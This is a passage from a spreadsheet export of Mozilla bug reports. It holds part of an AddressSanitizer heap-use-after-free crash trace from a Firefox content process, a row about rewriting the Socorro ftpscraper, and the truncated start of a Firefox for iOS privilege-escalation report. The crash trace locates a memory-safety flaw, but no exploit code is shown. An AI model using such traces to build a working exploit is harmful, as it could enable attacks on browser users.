    #21 0x7f067c34339f in mozilla::dom::GetPropertyOnPrototype(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, bool*, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:2096:10
    #22 0x7f067aaeecb6 in mozilla::dom::CSS2PropertiesBinding::DOMProxyHandler::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) const /builds/worker/workspace/build/src/obj-firefox/dom/bindings/CSS2PropertiesBinding.cpp:65860:8
    #23 0x7f068361ec20 in getInternal /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:353:21
    #24 0x7f068361ec20 in js::Proxy::get(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/proxy/Proxy.cpp:363
    #25 0x7f068296225b in GetProperty /builds/worker/workspace/build/src/js/src/vm/NativeObject.h:1600:16
    #26 0x7f068296225b in GetProperty /builds/worker/workspace/build/src/js/src/jsobj.h:806
    #27 0x7f068296225b in js::GetProperty(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::PropertyName*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:4393
    #28 0x7f0682944c98 in GetPropertyOperation /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:219:12
    #29 0x7f0682944c98 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:2786
    #30 0x7f068292a14a in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #31 0x7f06829578ef in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #32 0x7f06829587e2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #33 0x7f068339d16b in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3020:12
    #34 0x7f067bd697e5 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #35 0x7f067c761e1d in Call&lt;nsISupports *&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #36 0x7f067c761e1d in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #37 0x7f067c72ab46 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1118:51
    #38 0x7f067c72cd12 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1293:20
    #39 0x7f067c70c3f1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
    #40 0x7f067c70f8c2 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #41 0x7f067e9cf5ce in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1064:7
    #42 0x7f06819eaafa in nsDocShell::EndPageLoad(nsIWebProgress*, nsIChannel*, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7759:21
    #43 0x7f06819e6b24 in nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7557:7
    #44 0x7f06819ee37f in non-virtual thunk to nsDocShell::OnStateChange(nsIWebProgress*, nsIRequest*, unsigned int, nsresult) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7454:13
    #45 0x7f0679638ba3 in nsDocLoader::DoFireOnStateChange(nsIWebProgress*, nsIRequest*, int&amp;, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:1320:3
    #46 0x7f0679637d0c in nsDocLoader::doStopDocumentLoad(nsIRequest*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:861:14
    #47 0x7f0679634d98 in nsDocLoader::DocLoaderIsEmpty(bool) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:750:9
    #48 0x7f0679636cb2 in nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:632:5
    #49 0x7f067963790c in non-virtual thunk to nsDocLoader::OnStopRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/uriloader/base/nsDocLoader.cpp:488:14
    #50 0x7f0677bc7c40 in mozilla::net::nsLoadGroup::RemoveRequest(nsIRequest*, nsISupports*, nsresult) /builds/worker/workspace/build/src/netwerk/base/nsLoadGroup.cpp:629:28
    #51 0x7f067a7f8f9d in nsDocument::DoUnblockOnload() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9331:18
    #52 0x7f067a7f8b61 in nsDocument::UnblockOnload(bool) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:9253:9
    #53 0x7f067a7d2c39 in nsDocument::DispatchContentLoadedEvents() /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:5645:3
    #54 0x7f067a84bf72 in applyImpl&lt;nsDocument, void (nsDocument::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1142:12
    #55 0x7f067a84bf72 in apply&lt;nsDocument, void (nsDocument::*)()&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1148
    #56 0x7f067a84bf72 in mozilla::detail::RunnableMethodImpl&lt;nsDocument*, void (nsDocument::*)(), true, (mozilla::RunnableKind)0&gt;::Run() /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:1192
    #57 0x7f06779f0f01 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25
    #58 0x7f0677a15f26 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #59 0x7f0677a303e8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #60 0x7f0678802281 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/worker/workspace/build/src/ipc/glue/MessagePump.cpp:97:21
    #61 0x7f06787627bb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #62 0x7f06787627bb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #63 0x7f06787627bb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #64 0x7f067e176c7f in nsBaseAppShell::Run() /builds/worker/workspace/build/src/widget/nsBaseAppShell.cpp:158:27
    #65 0x7f06826a8e97 in XRE_RunAppShell() /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:877:22
    #66 0x7f06787627bb in RunInternal /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:326:10
    #67 0x7f06787627bb in RunHandler /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:319
    #68 0x7f06787627bb in MessageLoop::Run() /builds/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:299
    #69 0x7f06826a884a in XRE_InitChildProcess(int, char**, XREChildData const*) /builds/worker/workspace/build/src/toolkit/xre/nsEmbedFunctions.cpp:703:34
    #70 0x4ec2de in content_process_main /builds/worker/workspace/build/src/browser/app/../../ipc/contentproc/plugin-container.cpp:63:30
    #71 0x4ec2de in main /builds/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:280
    #72 0x7f069532582f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #73 0x41dbc8 in _start (/fuzzer3/firefox/firefox+0x41dbc8)
0x62200003f110 is located 16 bytes inside of 5768-byte region [0x62200003f100,0x622000040788)
freed by thread T0 (file:// Content) here:
    #0 0x4bc0fb in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:47:3
    #1 0x7f067e8cd67e in mozilla::PresShell::Release() /builds/worker/workspace/build/src/layout/base/PresShell.cpp:841:1
    #2 0x7f067e9d712b in assign_assuming_AddRef /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:355:7
    #3 0x7f067e9d712b in operator= /builds/worker/workspace/build/src/obj-firefox/dist/include/nsCOMPtr.h:631
    #4 0x7f067e9d712b in nsDocumentViewer::DestroyPresShell() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:4645
    #5 0x7f067e9c754c in nsDocumentViewer::Destroy() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1752:5
    #6 0x7f067e9d8fae in nsDocumentViewer::Show() /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:2089:17
    #7 0x7f067ea69deb in nsPresContext::EnsureVisible() /builds/worker/workspace/build/src/layout/base/nsPresContext.cpp:2241:31
    #8 0x7f067e8ef353 in mozilla::PresShell::UnsuppressAndInvalidate() /builds/worker/workspace/build/src/layout/base/PresShell.cpp:3892:54
    #9 0x7f067e8da167 in UnsuppressPainting /builds/worker/workspace/build/src/layout/base/PresShell.cpp:3935:5
    #10 0x7f067e8da167 in mozilla::PresShell::sPaintSuppressionCallback(nsITimer*, void*) /builds/worker/workspace/build/src/layout/base/PresShell.cpp:1861
    #11 0x7f0677a35196 in nsTimerImpl::Fire(int) /builds/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:701:7
    #12 0x7f0677a071f6 in nsTimerEvent::Run() /builds/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:286:11
    #13 0x7f06779f0f01 in mozilla::SchedulerGroup::Runnable::Run() /builds/worker/workspace/build/src/xpcom/threads/SchedulerGroup.cpp:396:25
    #14 0x7f0677a15f26 in nsThread::ProcessNextEvent(bool, bool*) /builds/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1037:14
    #15 0x7f0677a303e8 in NS_ProcessNextEvent(nsIThread*, bool) /builds/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:513:10
    #16 0x7f067dfb9f57 in SpinEventLoopUntil&lt;mozilla::ProcessFailureBehavior::ReportToCaller, (lambda at /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3106:31)&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/nsThreadUtils.h:323:25
    #17 0x7f067dfb9f57 in mozilla::dom::XMLHttpRequestMainThread::SendInternal(mozilla::dom::BodyExtractorBase const*) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:3106
    #18 0x7f067dfbb77c in mozilla::dom::XMLHttpRequestMainThread::Send(JSContext*, mozilla::dom::Nullable&lt;mozilla::dom::DocumentOrBlobOrArrayBufferViewOrArrayBufferOrFormDataOrURLSearchParamsOrUSVString&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/xhr/XMLHttpRequestMainThread.cpp:2935:11
    #19 0x7f067bb89f7f in mozilla::dom::XMLHttpRequestBinding::send(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::XMLHttpRequest*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/XMLHttpRequestBinding.cpp:1249:9
    #20 0x7f067c34d570 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/dom/bindings/BindingUtils.cpp:3040:13
    #21 0x7f06829577f0 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #22 0x7f06829577f0 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #23 0x7f0682942447 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #24 0x7f0682942447 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3067
    #25 0x7f068292a14a in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #26 0x7f06829578ef in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #27 0x7f06829587e2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #28 0x7f068339d16b in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3020:12
    #29 0x7f067bd6c7c7 in mozilla::dom::EventListener::HandleEvent(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventListenerBinding.cpp:47:8
    #30 0x7f067c72ab0c in HandleEvent&lt;mozilla::dom::EventTarget *&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventListenerBinding.h:65:12
    #31 0x7f067c72ab0c in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1115
    #32 0x7f067c72cd12 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1293:20
    #33 0x7f067c70c6ba in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:486:14
    #34 0x7f067c70f8c2 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #35 0x7f067c6deaba in mozilla::EventDispatcher::DispatchDOMEvent(nsISupports*, mozilla::WidgetEvent*, nsIDOMEvent*, nsPresContext*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:891:12
    #36 0x7f067a8c20b1 in nsINode::DispatchEvent(nsIDOMEvent*, bool*) /builds/worker/workspace/build/src/dom/base/nsINode.cpp:1337:5
previously allocated by thread T0 (file:// Content) here:
    #0 0x4bc44c in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64:3
    #1 0x4ed85d in moz_xmalloc /builds/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:84:17
    #2 0x7f067a7bf033 in operator new /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:206:12
    #3 0x7f067a7bf033 in nsDocument::CreateShell(nsPresContext*, nsViewManager*, mozilla::StyleSetHandle) /builds/worker/workspace/build/src/dom/base/nsDocument.cpp:4137
    #4 0x7f067e9c9e1f in nsDocumentViewer::InitPresentationStuff(bool) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:684:27
    #5 0x7f067e9c96ef in nsDocumentViewer::InitInternal(nsIWidget*, nsISupports*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;, bool, bool, bool) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:942:10
    #6 0x7f067e9c8957 in nsDocumentViewer::Init(nsIWidget*, mozilla::gfx::IntRectTyped&lt;mozilla::gfx::UnknownUnits&gt; const&amp;) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:659:10
    #7 0x7f06819e459b in nsDocShell::SetupNewViewer(nsIContentViewer*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:9552:7
    #8 0x7f06819e2f5c in nsDocShell::Embed(nsIContentViewer*, char const*, nsISupports*) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:7376:17
    #9 0x7f06819f19d8 in nsDocShell::CreateAboutBlankContentViewer(nsIPrincipal*, nsIURI*, bool, bool) /builds/worker/workspace/build/src/docshell/base/nsDocShell.cpp:8250:14
    #10 0x7f067a477cd5 in nsGlobalWindow::SetInitialPrincipalToSubject() /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:2605:18
    #11 0x7f06826045b6 in nsWindowWatcher::OpenWindowInternal(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsIArray*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:1117:18
    #12 0x7f06826099df in OpenWindow2 /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:444:10
    #13 0x7f06826099df in non-virtual thunk to nsWindowWatcher::OpenWindow2(mozIDOMWindowProxy*, char const*, char const*, char const*, bool, bool, bool, nsISupports*, bool, bool, nsIDocShellLoadInfo*, mozIDOMWindowProxy**) /builds/worker/workspace/build/src/toolkit/components/windowwatcher/nsWindowWatcher.cpp:416
    #14 0x7f067a4c7145 in nsGlobalWindow::OpenInternal(nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, bool, bool, bool, bool, bool, nsIArray*, nsISupports*, nsIDocShellLoadInfo*, bool, nsPIDOMWindowOuter**) /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:12911:21
    #15 0x7f067a4c571f in OpenJS /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8966:10
    #16 0x7f067a4c571f in nsGlobalWindow::OpenOuter(nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8928
    #17 0x7f067a4c5bad in nsGlobalWindow::Open(nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, nsTSubstring&lt;char16_t&gt; const&amp;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/dom/base/nsGlobalWindow.cpp:8937:3
    #18 0x7f067babfc23 in mozilla::dom::WindowBinding::open(JSContext*, JS::Handle&lt;JSObject*&gt;, nsGlobalWindow*, JSJitMethodCallArgs const&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:2192:56
    #19 0x7f067babdf85 in mozilla::dom::WindowBinding::genericMethod(JSContext*, unsigned int, JS::Value*) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/WindowBinding.cpp:15335:13
    #20 0x7f06829577f0 in CallJSNative /builds/worker/workspace/build/src/js/src/jscntxtinlines.h:291:15
    #21 0x7f06829577f0 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:473
    #22 0x7f0682942447 in CallFromStack /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:528:12
    #23 0x7f0682942447 in Interpret(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:3067
    #24 0x7f068292a14a in js::RunScript(JSContext*, js::RunState&amp;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:423:12
    #25 0x7f06829578ef in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:495:15
    #26 0x7f06829587e2 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/vm/Interpreter.cpp:541:10
    #27 0x7f068339d16b in JS::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::HandleValueArray const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /builds/worker/workspace/build/src/js/src/jsapi.cpp:3020:12
    #28 0x7f067bd697e5 in mozilla::dom::EventHandlerNonNull::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, mozilla::dom::Event&amp;, JS::MutableHandle&lt;JS::Value&gt;, mozilla::ErrorResult&amp;) /builds/worker/workspace/build/src/obj-firefox/dom/bindings/EventHandlerBinding.cpp:260:37
    #29 0x7f067c761e1d in Call&lt;nsISupports *&gt; /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/dom/EventHandlerBinding.h:362:12
    #30 0x7f067c761e1d in mozilla::JSEventHandler::HandleEvent(nsIDOMEvent*) /builds/worker/workspace/build/src/dom/events/JSEventHandler.cpp:215
    #31 0x7f067c72ab46 in mozilla::EventListenerManager::HandleEventSubType(mozilla::EventListenerManager::Listener*, nsIDOMEvent*, mozilla::dom::EventTarget*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1118:51
    #32 0x7f067c72cd12 in mozilla::EventListenerManager::HandleEventInternal(nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent**, mozilla::dom::EventTarget*, nsEventStatus*) /builds/worker/workspace/build/src/dom/events/EventListenerManager.cpp:1293:20
    #33 0x7f067c70c3f1 in mozilla::EventTargetChainItem::HandleEventTargetChain(nsTArray&lt;mozilla::EventTargetChainItem&gt;&amp;, mozilla::EventChainPostVisitor&amp;, mozilla::EventDispatchingCallback*, mozilla::ELMCreationDetector&amp;) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:462:16
    #34 0x7f067c70f8c2 in mozilla::EventDispatcher::Dispatch(nsISupports*, nsPresContext*, mozilla::WidgetEvent*, nsIDOMEvent*, nsEventStatus*, mozilla::EventDispatchingCallback*, nsTArray&lt;mozilla::dom::EventTarget*&gt;*) /builds/worker/workspace/build/src/dom/events/EventDispatcher.cpp:822:9
    #35 0x7f067e9cf5ce in nsDocumentViewer::LoadComplete(nsresult) /builds/worker/workspace/build/src/layout/base/nsDocumentViewer.cpp:1064:7
SUMMARY: AddressSanitizer: heap-use-after-free /builds/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:287:27 in get
Shadow bytes around the buggy address:
  0x0c447ffffdd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c447ffffde0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c447ffffdf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c447ffffe00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c447ffffe10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=&gt;0x0c447ffffe20: fd fd[fd]fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c447ffffe30: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c447ffffe40: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c447ffffe50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c447ffffe60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c447ffffe7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0774==ABORTING</t>
        </is>
      </c>
      <c r="X1008" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="1009">
      <c r="A1009" t="n">
        <v>1506907</v>
      </c>
      <c r="B1009" t="inlineStr">
        <is>
          <t>2018-11-13 09:45:21 -0800</t>
        </is>
      </c>
      <c r="C1009" t="inlineStr">
        <is>
          <t>rewrite ftpscraper</t>
        </is>
      </c>
      <c r="D1009" t="inlineStr">
        <is>
          <t>2018-11-15 19:12:17 -0800</t>
        </is>
      </c>
      <c r="E1009" t="n">
        <v>1</v>
      </c>
      <c r="F1009" t="n">
        <v>1</v>
      </c>
      <c r="G1009" t="n">
        <v>4</v>
      </c>
      <c r="H1009" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I1009" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J1009" t="inlineStr">
        <is>
          <t>Processor</t>
        </is>
      </c>
      <c r="K1009" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1009" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1009" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1009" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O1009" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1009" t="inlineStr"/>
      <c r="Q1009" t="inlineStr">
        <is>
          <t>P2</t>
        </is>
      </c>
      <c r="R1009" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S1009" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1009" t="n">
        <v>1</v>
      </c>
      <c r="U1009" t="n">
        <v>0</v>
      </c>
      <c r="V1009" t="n">
        <v>9</v>
      </c>
      <c r="W1009" t="inlineStr">
        <is>
          <t>ftpscraper does a bunch of stuff to populate the product_versions table. We want to get rid of that table and all the related postgres bits, but we need to keep scraping archive.mozilla.org because Buildhub isn't quite there, yet.
The new scraper should:
1. run as a crontabber app
2. scrape archive.mozilla.org
3. save data to a single table that is backed by a Django model with all the information required to do BetaVersionRule lookups
This bug covers that rewrite.</t>
        </is>
      </c>
      <c r="X1009" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="1010">
      <c r="A1010" t="n">
        <v>1861405</v>
      </c>
      <c r="B1010" t="inlineStr">
        <is>
          <t>2023-10-26 06:24:46 -0700</t>
        </is>
      </c>
      <c r="C1010" t="inlineStr">
        <is>
          <t>Privilege escalation in Firefox for iOS through &lt;a [referrerpolicy]&gt; in ReaderMode</t>
        </is>
      </c>
      <c r="D1010" t="inlineStr">
        <is>
          <t>2024-08-14 15:37:11 -0700</t>
        </is>
      </c>
      <c r="E1010" t="n">
        <v>1</v>
      </c>
      <c r="F1010" t="n">
        <v>1</v>
      </c>
      <c r="G1010" t="n">
        <v>2</v>
      </c>
      <c r="H1010" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I1010" t="inlineStr">
        <is>
          <t>Firefox for iOS</t>
        </is>
      </c>
      <c r="J1010" t="inlineStr">
        <is>
          <t>General</t>
        </is>
      </c>
      <c r="K1010" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L1010" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M1010" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N1010" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O1010" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P1010" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?]</t>
        </is>
      </c>
      <c r="Q1010" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R1010" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="S1010" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T1010" t="n">
        <v>1</v>
      </c>
      <c r="U1010" t="n">
        <v>0</v>
      </c>
      <c r="V1010" t="n">
        <v>12</v>
      </c>
      <c r="W1010" t="inlineStr">
